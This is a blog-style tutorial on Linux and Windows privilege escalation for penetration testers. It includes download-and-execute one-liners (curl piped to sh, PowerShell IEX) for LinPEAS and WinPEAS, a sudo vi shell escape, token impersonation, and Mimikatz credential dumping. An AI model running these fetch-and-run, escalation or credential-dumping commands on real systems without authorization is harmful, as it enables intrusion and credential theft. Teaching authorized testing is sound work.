Privilege Escalation: Essential Techniques for Ethical Hackers

By /

Listen to this Post

If you want to get anywhere in cybersecurity, you have to master privilege escalation. Whether you’re performing penetration testing or red teaming, escalating privileges is a critical step in compromising a system.

Automated Tools for Privilege Escalation

Using tools like LinPEAS (Linux) and WinPEAS (Windows) can significantly speed up the process by identifying misconfigurations, weak permissions, and known vulnerabilities.

Linux Privilege Escalation with LinPEAS

Run the following command to download and execute LinPEAS: 

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

LinPEAS checks for:

  • SUID/SGID misconfigurations (find / -perm -4000 2>/dev/null)
  • Writable files (find / -writable 2>/dev/null | cut -d "/" -f 2,3 | sort -u)
  • Cron jobs (cat /etc/crontab)
  • Environment variables (env)

Windows Privilege Escalation with WinPEAS

Execute WinPEAS via PowerShell:

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')

WinPEAS checks for:

  • Unquoted service paths (wmic service get name,pathname,startmode | findstr /i auto)
  • Weak registry permissions (reg query HKLM\System\CurrentControlSet\Services /s)
  • AlwaysInstallElevated (reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated)

You Should Know: Manual Privilege Escalation Techniques

While automated tools help, manual techniques ensure deeper exploitation:

Linux Manual Checks

1. Kernel Exploits

  • Check kernel version: 
    uname -a
  • Search for exploits: 
    searchsploit "Linux Kernel 5.4.0"

2. Abusing Sudo Rights

  • Check sudo permissions: 
    sudo -l
  • Exploit if allowed (e.g., sudo vi → :!bash).

3. Docker Breakout

  • Check if inside a container: 
    cat /proc/1/cgroup | grep -i docker
  • Exploit via privileged container escape.

Windows Manual Checks

1. Token Impersonation

  • Use RottenPotato or JuicyPotato: 
    Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"

2. Pass-the-Hash Attacks

  • Dump hashes with Mimikatz: 
    sekurlsa::logonpasswords

3. DLL Hijacking

  • Find missing DLLs with ProcMon.
  • Replace with malicious DLL.

Security Best Practices

  • Always verify tools from official repositories (GitHub).
  • Avoid random scripts—malicious ones may backdoor your system.
  • Patch systems regularly to prevent exploitation.

What Undercode Say

Privilege escalation is a fundamental skill in offensive security. Whether using automated tools or manual techniques, understanding system weaknesses is key.

Linux Commands to Remember:

 Check for world-writable files 
find / -perm -o=w -type d,f 2>/dev/null

Check active processes 
ps aux | grep root

Check network connections 
netstat -tulnp

Windows Commands to Remember:

 List all users 
net user

Check installed patches 
wmic qfe list

Check firewall rules 
netsh advfirewall show allprofiles

Expected Output:

A well-documented privilege escalation report with actionable findings.

Relevant URLs:

References:

Reported By: Baileynmarshall If – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: